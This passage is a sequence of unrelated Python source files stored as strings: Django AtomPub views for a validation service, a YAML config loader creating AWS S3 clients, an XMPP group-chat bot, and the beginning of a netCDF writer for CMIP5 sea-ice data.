data that makes sense for the heatmap\n result_counts = Validate.objects.last_verified_status_counts()\n total = sum(result_counts.values())\n sums_by_date = Validate.sums_by_date()\n sums_by_date_g = {}\n years = set()\n for dt, ct in sums_by_date.items():\n y, m, d = dt\n dt = (y, m - 1, d)\n sums_by_date_g[dt] = ct\n years.add(y)\n sums_by_date = sums_by_date_g\n num_years = len(years)\n return render(\n request,\n \'coda_validate/stats.html\',\n {\n \'sums_by_date\': dict(((\'%d, %d, %d\' % s, c)\n for s, c in sums_by_date.items())),\n \'num_years\': num_years,\n \'validations\': total,\n \'this_month\': Validate.objects.filter(\n last_verified__range=this_month_range).count(),\n \'last_24h\': Validate.objects.filter(\n last_verified__range=[twenty_four_hours_ago, now]).count(),\n \'last_vp\': Validate.objects.filter(\n last_verified__range=[since_validation_period, now]).count(),\n \'unverified\': result_counts.get(\'Unverified\'),\n \'passed\': result_counts.get(\'Passed\'),\n \'failed\': result_counts.get(\'Failed\'),\n \'validation_period\': \'%s days\' % str(settings.VALIDATION_PERIOD.days),\n }\n )\n\n\ndef prioritize(request):\n """"""\n prioritize view\n """"""\n\n identifier = request.GET.get(\'identifier\')\n prioritized = False\n if identifier:\n v = get_object_or_404(Validate, identifier=identifier)\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n prioritized = True\n return render(\n request,\n \'coda_validate/prioritize.html\',\n {\n \'identifier\': identifier,\n \'prioritized\': prioritized,\n }\n )\n\n\ndef validate(request, identifier):\n """"""\n prioritize view\n """"""\n\n # this view always gets an identifier, if it\'s wrong, 404\n v = get_object_or_404(Validate, identifier=identifier)\n # clicked priority button on validate detail page\n p = request.GET.get(\'priority\')\n if p == \'1\':\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n return render(\n request,\n \'coda_validate/validate.html\',\n {\n \'validate\': v,\n }\n )\n\n\ndef prioritize_json(request):\n """"""\n prioritize json view\n """"""\n\n DOMAIN = Site.objects.get_current().domain\n identifier = request.GET.get(\'identifier\')\n json_dict = {}\n json_dict[\'status\'] = \'failure\'\n status = 404\n if identifier:\n json_dict[\'requested_identifier\'] = identifier\n try:\n v = Validate.objects.get(identifier=identifier)\n except Exception:\n v = None\n if v:\n v.priority = 1\n v.priority_change_date = datetime.datetime.now()\n v.save()\n json_dict[\'status\'] = \'success\'\n json_dict[\'priority\'] = v.priority\n json_dict[\'priority_change_date\'] = str(v.priority_change_date)\n json_dict[\'atom_pub_url\'] = \'%s/APP/validate/%s\' % \\\n (DOMAIN, v.identifier)\n status = 200\n else:\n json_dict[\'response\'] = \'identifier was not found\'\n json_dict[\'requested_identifier\'] = identifier\n else:\n json_dict[\'response\'] = \'missing identifier parameter\'\n json_dict[\'requested_identifier\'] = \'\'\n status = 400\n response = HttpResponse(content_type=\'application/json\', status=status)\n json.dump(\n json_dict,\n fp=response,\n indent=4,\n sort_keys=True,\n )\n return response\n\n\ndef validateToXML(validateObject):\n """"""\n This is the reverse of xmlToValidateObject.\n Given a ""Validate"" object, it generates an\n XML object representative of such.\n """"""\n\n # define namespace\n validate_namespace = ""http://digital2.library.unt.edu/coda/validatexml/""\n val = ""{%s}"" % validate_namespace\n validate_nsmap = {""validate"": 
validate_namespace}\n\n # build xml from object and return\n XML = etree.Element(""{0}validate"".format(val), nsmap=validate_nsmap)\n\n label = etree.SubElement(XML, ""{0}identifier"".format(val))\n label.text = validateObject.identifier\n\n last_verified = etree.SubElement(XML, ""{0}last_verified"".format(val))\n last_verified.text = validateObject.last_verified.isoformat()\n\n last_verified_status = etree.SubElement(XML, ""{0}last_verified_status"".format(val))\n last_verified_status.text = validateObject.last_verified_status\n\n priority_change_date = etree.SubElement(XML, ""{0}priority_change_date"".format(val))\n priority_change_date.text = validateObject.priority_change_date.isoformat()\n\n priority = etree.SubElement(XML, ""{0}priority"".format(val))\n priority.text = str(validateObject.priority)\n\n server = etree.SubElement(XML, ""{0}server"".format(val))\n server.text = validateObject.server\n\n return XML\n\n\ndef xmlToValidateObject(validateXML):\n """"""\n Parse the XML in a POST request and create the validate object\n """"""\n\n entryRoot = etree.XML(validateXML)\n if entryRoot is None:\n raise ValueError(""Unable to parse uploaded XML"")\n # parse XML\n contentElement = entryRoot.xpath(""*[local-name() = \'content\']"")[0]\n validateXML = contentElement.xpath(""*[local-name() = \'validate\']"")[0]\n identifier = validateXML.xpath(\n ""*[local-name() = \'identifier\']"")[0].text.strip()\n\n last_verified = validateXML.xpath(\n ""*[local-name() = \'last_verified\']"")[0].text.strip()\n last_verified = parser.parse(last_verified)\n\n last_verified_status = validateXML.xpath(\n ""*[local-name() = \'last_verified_status\']"")[0].text.strip()\n\n priority_change_date = validateXML.xpath(\n ""*[local-name() = \'priority_change_date\']"")[0].text.strip()\n priority_change_date = parser.parse(priority_change_date)\n\n priority = validateXML.xpath(\n ""*[local-name() = \'priority\']"")[0].text.strip()\n\n server = validateXML.xpath(""*[local-name() = \'server\']"")[0].text.strip()\n\n # make the object and return\n validate = Validate(\n identifier=identifier,\n last_verified=last_verified,\n last_verified_status=last_verified_status,\n priority_change_date=priority_change_date,\n priority=priority,\n server=server,\n )\n return validate\n\n\ndef xmlToUpdateValidateObject(validateXML):\n """"""\n Parse the XML in a PUT request and adjust the validate based on that\n *ONLY MODIFIES \'last_verified_status\'*\n """"""\n\n entryRoot = etree.XML(validateXML)\n if entryRoot is None:\n raise ValueError(""Unable to parse uploaded XML"")\n # parse XML\n contentElement = entryRoot.xpath(""*[local-name() = \'content\']"")[0]\n validateXML = contentElement.xpath(""*[local-name() = \'validate\']"")[0]\n identifier = validateXML.xpath(\n ""*[local-name() = \'identifier\']"")[0].text.strip()\n last_verified_status = validateXML.xpath(\n ""*[local-name() = \'last_verified_status\']"")[0].text.strip()\n # get the object (or 404) and return to the APP view to finish up.\n validate = get_object_or_404(Validate, identifier=identifier)\n validate.last_verified_status = last_verified_status\n validate.last_verified = datetime.datetime.now()\n validate.priority = 0\n validate.save()\n return validate\n\n\ndef app_validate(request, identifier=None):\n """"""\n This method handles the ATOMpub protocol for validate objects\n """"""\n\n # are we POSTing a new identifier here?\n if request.method == \'POST\' and not identifier:\n # to object\n validateObject = xmlToValidateObject(request.body)\n 
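# --- Aside: a hedged, self-contained illustration of the lxml namespace
# pattern validateToXML() uses above -- Clark notation '{uri}tag' for
# element names plus an nsmap controlling the serialized prefix:
from lxml import etree

CODA_NS = 'http://digital2.library.unt.edu/coda/validatexml/'

def tiny_validate_xml(identifier):
    root = etree.Element('{%s}validate' % CODA_NS,
                         nsmap={'validate': CODA_NS})
    ident = etree.SubElement(root, '{%s}identifier' % CODA_NS)
    ident.text = identifier
    return etree.tostring(root, pretty_print=True)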
validateObject.save()\n # and back to xml\n validateObjectXML = validateToXML(validateObject)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], validateObject.identifier\n ),\n title=validateObject.identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 201\n resp[\'Location\'] = \'http://%s/APP/validate/%s/\' % \\\n (request.META[\'HTTP_HOST\'], validateObject.identifier)\n elif request.method == \'HEAD\':\n resp = HttpResponse(content_type=""application/atom+xml"")\n resp.status_code = 200\n # if not, return a feed\n elif request.method == \'GET\' and not identifier:\n # negotiate the details of our feed here\n validates = Validate.objects.all()\n page = int(request.GET[\'page\']) if request.GET.get(\'page\') else 1\n atomFeed = makeObjectFeed(\n paginator=Paginator(validates, 20),\n objectToXMLFunction=validateToXML,\n feedId=request.path[1:],\n webRoot=\'http://%s\' % request.META.get(\'HTTP_HOST\'),\n title=""validate Entry Feed"",\n idAttr=""identifier"",\n nameAttr=""identifier"",\n dateAttr=""added"",\n request=request,\n page=page,\n author={\n ""name"": APP_AUTHOR.get(\'name\', None),\n ""uri"": APP_AUTHOR.get(\'uri\', None)\n },\n )\n atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True)\n resp = HttpResponse(atomFeedText, content_type=""application/atom+xml"")\n resp.status_code = 200\n # updating an existing record\n elif request.method == \'PUT\' and identifier:\n returnValidate = xmlToUpdateValidateObject(request.body)\n validateObjectXML = validateToXML(returnValidate)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n elif request.method == \'GET\' and identifier:\n # attempt to retrieve record -- error if unable\n try:\n validate_object = Validate.objects.get(identifier=identifier)\n except Validate.DoesNotExist:\n return HttpResponseNotFound(\n ""There is no validate for identifier %s.\\n"" % identifier\n )\n returnValidate = validate_object\n validateObjectXML = validateToXML(returnValidate)\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n author=APP_AUTHOR.get(\'name\', None),\n author_uri=APP_AUTHOR.get(\'uri\', None)\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n elif request.method == \'DELETE\' and identifier:\n # attempt to retrieve record -- error if unable\n try:\n validate_object = Validate.objects.get(identifier=identifier)\n except:\n return HttpResponseNotFound(\n ""Unable to Delete. 
There is no identifier %s.\\n"" % identifier)\n # grab the validate, delete it, and inform the user.\n returnValidate = validate_object\n validateObjectXML = validateToXML(returnValidate)\n validate_object.delete()\n atomXML = wrapAtom(\n xml=validateObjectXML,\n id=\'http://%s/APP/validate/%s/\' % (\n request.META[\'HTTP_HOST\'], identifier\n ),\n title=identifier,\n )\n atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)\n resp = HttpResponse(atomText, content_type=""application/atom+xml"")\n resp.status_code = 200\n return resp\n\n\ndef check_json(request):\n counts = Validate.objects.last_verified_status_counts()\n return HttpResponse(json.dumps(counts), content_type=\'application/json\')\n\n\nclass ValidateListView(ListView):\n model = Validate\n template_name = \'coda_validate/list.html\'\n context_object_name = \'validation_list\'\n paginate_by = 20\n\n def get_queryset(self):\n queryset = super(ValidateListView, self).get_queryset()\n\n status = self.request.GET.get(\'status\')\n if status:\n queryset = queryset.filter(last_verified_status=status)\n\n return queryset\n', '#!/usr/bin/env python2\n# coding=utf-8\n""""""\nConfig Handler\n""""""\n\n__author__ = ""Manuel Ebert""\n__copyright__ = ""Copyright 2015, summer.ai""\n__date__ = ""2015-11-09""\n__email__ = dummy@email.com""\n\nimport boto3\nimport os\nfrom util import AttrDict\n\npath = os.path.dirname(os.path.abspath(__file__))\n\n\ndef load_yaml(filename):\n """"""\n This is a shitty YAML parser. If we were grown ups, we\'d use PyYaml of course.\n But since PyYaml refuses to run on AWS Lambda, we\'ll do this instead.\n\n Args:\n filename - filename to load\n Returns:\n dict\n """"""\n def parse_value(value):\n if ""#"" in value:\n value = value[:value.index(""#"")]\n value = value.strip("" \\n"")\n if not value:\n return None\n if value.lower() == ""true"":\n return True\n if value.lower() == ""false"":\n return False\n try:\n return int(value)\n except:\n try:\n return float(value)\n except:\n return value\n result = {}\n current_key = None\n with open(filename) as f:\n for line in f.readlines():\n if "":"" in line:\n key, value = line.split("":"", 1)\n key = key.strip()\n current_key = key\n result[key] = parse_value(value)\n elif line.strip().startswith(""-""):\n value = line.strip("" -\\n"")\n if not isinstance(result[current_key], list):\n result[current_key] = [parse_value(value)]\n else:\n result[current_key].append(parse_value(value))\n return result\n\n\ndef abs_path(filename):\n return os.path.join(path, ""config"", ""{}.yaml"".format(filename))\n\n\ndef load_config(config):\n keys = load_yaml(abs_path(""default""))\n\n keys[\'credentials\'] = {}\n if os.path.exists(abs_path(""credentials"")):\n keys[\'credentials\'] = load_yaml(abs_path(""credentials""))\n \n if config != \'default\':\n keys.update(load_yaml(abs_path(config)))\n\n if ""aws_access_key"" in keys[\'credentials\']:\n keys[\'s3\'] = boto3.resource(\n \'s3\', region_name=keys[\'region\'],\n aws_access_key_id=keys[\'credentials\'][\'aws_access_key\'],\n aws_secret_access_key=keys[\'credentials\'][\'aws_access_secret\']\n )\n keys[\'s3_client\'] = boto3.client(\n \'s3\', region_name=keys[\'region\'],\n aws_access_key_id=keys[\'credentials\'][\'aws_access_key\'],\n aws_secret_access_key=keys[\'credentials\'][\'aws_access_secret\']\n )\n else:\n keys[\'s3\'] = boto3.resource(\'s3\', region_name=keys[\'region\'])\n keys[\'s3_client\'] = boto3.client(\'s3\', region_name=keys[\'region\'])\n\n return AttrDict(keys)\n\n\nconfig = 
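# --- Aside: per its docstring, the hand-rolled parser above exists only
# because PyYAML would not run on AWS Lambda at the time. Where PyYAML is
# available, the same job is one call (assumption: PyYAML installed):
import yaml

def load_yaml_with_pyyaml(filename):
    with open(filename) as f:
        return yaml.safe_load(f)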
load_config(os.environ.get(\'WORDNIK_CONFIG\', \'default\'))\n\n\ndef update_config(config_name):\n global config\n config.__data.update(load_yaml(abs_path(config_name)))\n', '#!/usr/bin/env python3\n# vim:fileencoding=utf-8\n#\n# (C) Copyright 2012 lilydjwg dummy@email.com\n#\n# This file is part of xmpptalk.\n#\n# xmpptalk is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# xmpptalk is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with xmpptalk. If not, see .\n#\n\nimport sys\nimport os\nimport logging\nimport datetime\nimport base64\nimport hashlib\nfrom collections import defaultdict\nfrom functools import partial\nfrom xml.etree import ElementTree as ET\n\nimport pyxmpp2.exceptions\nfrom pyxmpp2.jid import JID\nfrom pyxmpp2.message import Message\nfrom pyxmpp2.presence import Presence\nfrom pyxmpp2.client import Client\nfrom pyxmpp2.settings import XMPPSettings\nfrom pyxmpp2.roster import RosterReceivedEvent\nfrom pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE\nfrom pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent\nfrom pyxmpp2.interfaces import XMPPFeatureHandler\nfrom pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler\nfrom pyxmpp2.ext.version import VersionProvider\nfrom pyxmpp2.expdict import ExpiringDictionary\nfrom pyxmpp2.iq import Iq\n\ntry:\n from xmpp_receipt import ReceiptSender\nexcept ImportError:\n ReceiptSender = None\n\nfrom misc import *\nimport config\nimport models\nfrom models import ValidationError\nfrom messages import MessageMixin\nfrom user import UserMixin\n\nif getattr(config, \'conn_lost_interval_minutes\', False):\n conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes)\nelse:\n conn_lost_interval = None\n\nclass ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler):\n got_roster = False\n message_queue = None\n receipt_sender = None\n ignore = set()\n\n def __init__(self, jid, settings, botsettings=None):\n if \'software_name\' not in settings:\n settings[\'software_name\'] = self.__class__.__name__\n if \'software_version\' not in settings:\n settings[\'software_version\'] = __version__\n version_provider = VersionProvider(settings)\n\n handlers = []\n if ReceiptSender:\n self.receipt_sender = rs = ReceiptSender()\n handlers.append(rs)\n\n handlers.extend([self, version_provider])\n self.client = Client(jid, handlers, settings)\n\n self.presence = defaultdict(dict)\n self.subscribes = ExpiringDictionary(default_timeout=5)\n self.invited = {}\n self.avatar_hash = None\n self.settings = botsettings\n\n def run(self):\n self.client.connect()\n self.jid = self.client.jid.bare()\n logger.info(\'self jid: %r\', self.jid)\n self.update_on_setstatus = set()\n\n if self.receipt_sender:\n self.receipt_sender.stream = self.client.stream\n self.client.run()\n\n def disconnect(self):\n \'\'\'Request disconnection and let the main loop run for a 2 more\n seconds for graceful disconnection.\'\'\'\n self.client.disconnect()\n while True:\n try:\n self.client.run(timeout = 2)\n except pyxmpp2.exceptions.StreamParseError:\n # we 
raise SystemExit to exit, expat says XML_ERROR_FINISHED\n pass\n else:\n break\n\n def handle_early_message(self):\n self.got_roster = True\n q = self.message_queue\n if q:\n self.now = datetime.datetime.utcnow()\n for sender, stanza in q:\n self.current_jid = sender\n self._cached_jid = None\n try:\n timestamp = stanza.as_xml().find(\'{urn:xmpp:delay}delay\').attrib[\'stamp\']\n except AttributeError:\n timestamp = None\n self.handle_message(stanza.body, timestamp)\n self.message_queue = self.__class__.message_queue = None\n\n @event_handler(RosterReceivedEvent)\n def roster_received(self, stanze):\n self.delayed_call(2, self.handle_early_message)\n self.delayed_call(getattr(config, \'reconnect_timeout\', 24 * 3600), self.signal_connect)\n nick, avatar_type, avatar_file = (getattr(config, x, None) for x in (\'nick\', \'avatar_type\', \'avatar_file\'))\n if nick or (avatar_type and avatar_file):\n self.set_vcard(nick, (avatar_type, avatar_file))\n return True\n\n def signal_connect(self):\n logging.info(\'Schedule to re-connecting...\')\n self.client.disconnect()\n\n @message_stanza_handler()\n def message_received(self, stanza):\n if stanza.stanza_type != \'chat\':\n return True\n if not stanza.body:\n logging.info(""%s message: %s"", stanza.from_jid, stanza.serialize())\n return True\n\n sender = stanza.from_jid\n body = stanza.body\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n\n logging.info(\'[%s] %s\', sender, stanza.body)\n if \'@\' not in str(sender.bare()):\n logging.info(\'(server messages ignored)\')\n return True\n\n if str(sender.bare()) in self.ignore:\n logging.info(\'(The above message is ignored on purpose)\')\n return True\n\n if getattr(config, \'ban_russian\'):\n if str(sender.bare()).endswith(\'.ru\'):\n logging.info(\'(Russian messager banned)\')\n return True\n elif is_russian(body):\n logging.info(\'(Russian message banned)\')\n return True\n\n if not self.got_roster:\n if not self.message_queue:\n self.message_queue = []\n self.message_queue.append((sender, stanza))\n else:\n self.handle_message(body)\n\n logging.info(\'done with new message\')\n return True\n\n def send_message(self, receiver, msg):\n if isinstance(receiver, str):\n receiver = JID(receiver)\n\n m = Message(\n stanza_type = \'chat\',\n from_jid = self.jid,\n to_jid = receiver,\n body = msg,\n )\n self.send(m)\n\n def reply(self, msg):\n self.send_message(self.current_jid, msg)\n\n def send(self, stanza):\n self.client.stream.send(stanza)\n\n def delayed_call(self, seconds, func, *args, **kwargs):\n self.client.main_loop.delayed_call(seconds, partial(func, *args, **kwargs))\n\n @event_handler(DisconnectedEvent)\n def handle_disconnected(self, event):\n return QUIT\n\n @property\n def roster(self):\n return self.client.roster\n\n def get_online_users(self):\n ret = [x.jid for x in self.roster if x.subscription == \'both\' and \\\n str(x.jid) in self.presence]\n logging.info(\'%d online buddies: %r\', len(ret), ret)\n return ret\n\n def get_xmpp_status(self, jid):\n return sorted(self.presence[str(jid)].values(), key=lambda x: x[\'priority\'], reverse=True)[0]\n\n def xmpp_setstatus(self, status, to_jid=None):\n if isinstance(to_jid, str):\n to_jid = JID(to_jid)\n\n presence = Presence(status=status, to_jid=to_jid)\n self.send(presence)\n\n def update_roster(self, jid, name=NO_CHANGE, groups=NO_CHANGE):\n self.client.roster_client.update_item(jid, name, groups)\n\n def removeInvitation(self):\n for ri in self.roster.values():\n if ri.ask is not None:\n 
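# --- Aside: a hedged distillation of the buffer-until-roster pattern that
# message_received() / handle_early_message() implement above: stanzas
# arriving before the roster is known are queued and replayed once it
# lands. Names here are illustrative, not from the original:
class QueueUntilReady(object):
    def __init__(self):
        self.ready = False
        self.pending = []

    def handle(self, item, process):
        if self.ready:
            process(item)
        else:
            self.pending.append(item)

    def mark_ready(self, process):
        self.ready = True
        while self.pending:
            process(self.pending.pop(0))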
self.client.roster_client.remove_item(ri.jid)\n logging.info(\'%s removed\', ri.jid)\n\n def unsubscribe(self, jid, type=\'unsubscribe\'):\n presence = Presence(to_jid=jid, stanza_type=type)\n self.send(presence)\n\n def subscribe(self, jid):\n self.invited[jid] = 2\n presence = Presence(to_jid=jid, stanza_type=\'subscribe\')\n self.send(presence)\n\n @presence_stanza_handler(\'subscribe\')\n def handle_presence_subscribe(self, stanza):\n logging.info(\'%s subscribe\', stanza.from_jid)\n sender = stanza.from_jid\n bare = sender.bare()\n\n # avoid repeated request\n invited = False\n if bare not in self.subscribes:\n invited = self.invited.get(bare, False)\n if invited is not False:\n if invited == 2:\n self.invited[bare] = 1\n else:\n del self.invited[bare]\n return stanza.make_accept_response()\n # We won\'t deny inivted members\n self.handle_userjoin_before()\n else:\n if config.private and str(bare) != config.root:\n self.send_message(sender, _(\'Sorry, this is a private group, and you are not invited.\'))\n return stanza.make_deny_response()\n if not self.handle_userjoin_before():\n return stanza.make_deny_response()\n\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n try:\n self.handle_userjoin(action=stanza.stanza_type)\n except ValidationError:\n #The server is subscribing\n pass\n self.subscribes[bare] = True\n\n if stanza.stanza_type.endswith(\'ed\'):\n return stanza.make_accept_response()\n\n if invited is False:\n presence = Presence(to_jid=stanza.from_jid.bare(),\n stanza_type=\'subscribe\')\n return [stanza.make_accept_response(), presence]\n\n @presence_stanza_handler(\'subscribed\')\n def handle_presence_subscribed(self, stanza):\n # use the same function\n logging.info(\'%s subscribed\', stanza.from_jid)\n return self.handle_presence_subscribe(stanza)\n\n @presence_stanza_handler(\'unsubscribe\')\n def handle_presence_unsubscribe(self, stanza):\n logging.info(\'%s unsubscribe\', stanza.from_jid)\n sender = stanza.from_jid\n self.current_jid = sender\n self.now = datetime.datetime.utcnow()\n self.handle_userleave(action=stanza.stanza_type)\n\n if stanza.stanza_type.endswith(\'ed\'):\n return stanza.make_accept_response()\n\n presence = Presence(to_jid=stanza.from_jid.bare(),\n stanza_type=\'unsubscribe\')\n return [stanza.make_accept_response(), presence]\n\n @presence_stanza_handler(\'unsubscribed\')\n def handle_presence_unsubscribed(self, stanza):\n # use the same function\n logging.info(\'%s unsubscribed\', stanza.from_jid)\n return self.handle_presence_unsubscribe(stanza)\n\n @presence_stanza_handler()\n def handle_presence_available(self, stanza):\n if stanza.stanza_type not in (\'available\', None):\n return False\n\n jid = stanza.from_jid\n plainjid = str(jid.bare())\n if plainjid == str(self.jid):\n return\n\n self.now = datetime.datetime.utcnow()\n if plainjid not in self.presence:\n type = \'new\'\n self.current_jid = jid\n self.user_update_presence(plainjid)\n if conn_lost_interval and self.current_user and self.current_user.last_seen and \\\n self.now - self.current_user.last_seen < conn_lost_interval:\n type = \'reconnect\'\n self.send_lost_message()\n logging.info(\'%s[%s] (%s)\', jid, stanza.show or \'available\', type)\n\n if self.roster and jid.bare() not in self.roster:\n presence = Presence(to_jid=jid.bare(), stanza_type=\'subscribe\')\n self.send(presence)\n presence = Presence(to_jid=jid.bare(), stanza_type=\'subscribed\')\n self.send(presence)\n else:\n if jid.resource not in self.presence[plainjid]:\n 
self.user_update_presence(plainjid)\n logging.info(\'%s[%s]\', jid, stanza.show or \'available\')\n\n self.presence[plainjid][jid.resource] = {\n \'show\': stanza.show,\n \'status\': stanza.status,\n \'priority\': stanza.priority,\n }\n\n if self.get_user_by_jid(plainjid) is None:\n try:\n self.current_jid = jid\n self.handle_userjoin()\n except ValidationError:\n #The server is subscribing\n pass\n\n if config.warnv105 and jid.resource and \\\n jid.resource.startswith(\'Talk.\') and not jid.resource.startswith(\'Talk.v104\'):\n # Got a Talk.v107...\n # No need to translate; GTalk only has a v105 for Chinese.\n self.send_message(jid, \'警告:你正在使用的可能是不加密的 GTalk v105 版本。网络上的其它人可能会截获您的消息。这样不安全!请使用 GTalk v104 英文版或者其它 XMPP 客户端。\\nGTalk 英文版: http://www.google.com/talk/index.html\\nPidgin: http://www.pidgin.im/\')\n\n return True\n\n @presence_stanza_handler(\'unavailable\')\n def handle_presence_unavailable(self, stanza):\n jid = stanza.from_jid\n plainjid = str(jid.bare())\n if plainjid in self.presence and plainjid != str(self.jid):\n try:\n del self.presence[plainjid][jid.resource]\n except KeyError:\n pass\n if self.presence[plainjid]:\n logging.info(\'%s[unavailable] (partly)\', jid)\n else:\n del self.presence[plainjid]\n self.now = datetime.datetime.utcnow()\n self.user_disappeared(plainjid)\n logging.info(\'%s[unavailable] (totally)\', jid)\n return True\n\n @event_handler()\n def handle_all(self, event):\n \'\'\'Log all events.\'\'\'\n logging.info(\'-- {0}\'.format(event))\n\n def get_name(self, jid):\n if isinstance(jid, str):\n jid = JID(jid)\n else:\n jid = jid.bare()\n try:\n return self.roster[jid].name or hashjid(jid)\n except KeyError:\n return hashjid(jid)\n\n def get_vcard(self, jid=None, callback=None):\n \'\'\'callback is used as both result handler and error handler\'\'\'\n q = Iq(\n to_jid = jid and jid.bare(),\n stanza_type = \'get\',\n )\n vc = ET.Element(""{vcard-temp}vCard"")\n q.add_payload(vc)\n if callback:\n self.stanza_processor.set_response_handlers(q, callback, callback)\n self.send(q)\n\n def set_vcard(self, nick=None, avatar=None):\n self.get_vcard(callback=partial(self._set_vcard, nick, avatar))\n\n def _set_vcard(self, nick=None, avatar=None, stanza=None):\n #FIXME: This doesn\'t seem to work with jabber.org\n q = Iq(\n from_jid = self.jid,\n stanza_type = \'set\',\n )\n vc = ET.Element(""{vcard-temp}vCard"")\n if nick is not None:\n n = ET.SubElement(vc, \'{vcard-temp}FN\')\n n.text = nick\n if avatar is not None:\n type, picfile = avatar\n photo = ET.SubElement(vc, \'{vcard-temp}PHOTO\')\n t = ET.SubElement(photo, \'{vcard-temp}TYPE\')\n t.text = type\n d = ET.SubElement(photo, \'{vcard-temp}BINVAL\')\n data = open(picfile, \'rb\').read()\n d.text = base64.b64encode(data).decode(\'ascii\')\n self.avatar_hash = hashlib.new(\'sha1\', data).hexdigest()\n\n q.add_payload(vc)\n self.stanza_processor.set_response_handlers(\n q, self._set_vcard_callback, self._set_vcard_callback)\n self.send(q)\n\n def _set_vcard_callback(self, stanza):\n if stanza.stanza_type == \'error\':\n logging.error(\'failed to set my vCard.\')\n else:\n logging.info(\'my vCard set.\')\n self.update_presence()\n\n def update_presence(self):\n #TODO: update for individual users\n presence = self.settings[\'presence\']\n x = ET.Element(\'{vcard-temp:x:update}x\')\n if self.avatar_hash:\n photo = ET.SubElement(x, \'{vcard-temp:x:update}photo\')\n photo.text = self.avatar_hash\n presence.add_payload(x)\n self.send(presence)\n\ndef runit(settings, mysettings):\n bot = ChatBot(JID(config.jid), 
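# --- Aside: a hedged, standalone version of the avatar step inside
# _set_vcard() above. vCard-based avatars (XEP-0153) carry the photo as
# base64 BINVAL and advertise the SHA-1 of the raw image bytes:
import base64
import hashlib

def encode_avatar(picfile):
    with open(picfile, 'rb') as fh:  # binary read; also closes the file
        data = fh.read()
    return (base64.b64encode(data).decode('ascii'),
            hashlib.sha1(data).hexdigest())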
settings, mysettings)\n try:\n bot.run()\n # Connection resets\n raise Exception\n except SystemExit as e:\n if e.code == CMD_RESTART:\n # restart\n bot.disconnect()\n models.connection.disconnect()\n try:\n os.close(lock_fd[0])\n except:\n pass\n logging.info(\'restart...\')\n os.execv(sys.executable, [sys.executable] + sys.argv)\n except KeyboardInterrupt:\n pass\n finally:\n ChatBot.message_queue = bot.message_queue\n bot.disconnect()\n\ndef main():\n gp = models.connection.Group.one()\n if gp and gp.status:\n st = gp.status\n else:\n st = None\n settings = dict(\n # deliver here even if the admin logs in\n initial_presence = Presence(priority=30, status=st),\n poll_interval = 3,\n )\n botsettings = {\n \'presence\': settings[\'initial_presence\'],\n }\n settings.update(config.settings)\n settings = XMPPSettings(settings)\n\n if config.trace:\n logging.info(\'enabling trace\')\n for logger in (\'pyxmpp2.IN\', \'pyxmpp2.OUT\'):\n logger = logging.getLogger(logger)\n logger.setLevel(logging.DEBUG)\n\n for logger in (\n \'pyxmpp2.mainloop.base\', \'pyxmpp2.expdict\',\n \'pyxmpp2.mainloop.poll\', \'pyxmpp2.mainloop.events\',\n \'pyxmpp2.transport\', \'pyxmpp2.mainloop.events\',\n ):\n logger = logging.getLogger(logger)\n logger.setLevel(max((logging.INFO, config.logging_level)))\n\n if config.logging_level > logging.DEBUG:\n restart_if_failed(runit, 3, args=(settings, botsettings))\n else:\n runit(settings, botsettings)\n\nif __name__ == \'__main__\':\n setup_logging()\n models.init()\n main()\n', 'from datetime import datetime, timedelta\nfrom netCDF4 import Dataset\nfrom netCDF4 import num2date\nimport numpy as np\nimport time\nimport os\n\n__author__ = \'Trond Kristiansen\'\n__email__ = dummy@email.com\'\n__created__ = datetime(2014, 1, 23)\n__modified__ = datetime(2014, 1, 23)\n__version__ = ""0.1""\n__status__ = ""Development""\n\n\ndef help ():\n """"""\n This function generates a netCDF4 file and saves the runnings average values for\n specific years into file for each IPCC AR5 model.\n \n Used to gether with extractIce.py\n """"""\n\ndef writeCMIP5File(modelName,scenario,myvarname,lon,lat,time,mydata,mydataanomaly,outfilename):\n \n myformat=\'NETCDF3_CLASSIC\'\n \n if os.path.exists(outfilename):\n os.remove(outfilename)\n print ""Results written to netcdf file: %s""%(outfilename)\n if myvarname==""sic"": myvar=""SIC""\n \n f1 = Dataset(outfilename, mode=\'w\', format=myformat)\n f1.title = ""IPCC AR5 %s""%(myvar)\n f1.description = ""IPCC AR5 running averages of %s for model %s for scenario %s""%(myvar,modelName,scenario)\n f1.history = ""Created "" + str(datetime.now())\n f1.source = ""Trond Kristiansen (dummy@email.com)""\n f1.type = ""File in NetCDF3 format created using iceExtract.py""\n f1.Conventions = ""CF-1.0""\n\n """"""Define dimensions""""""\n f1.createDimension(\'x\', len(lon))\n f1.createDimension(\'y\', len(lat))\n f1.createDimension(\'time\', None)\n \n vnc = f1.createVariable(\'longitude\', \'d\', 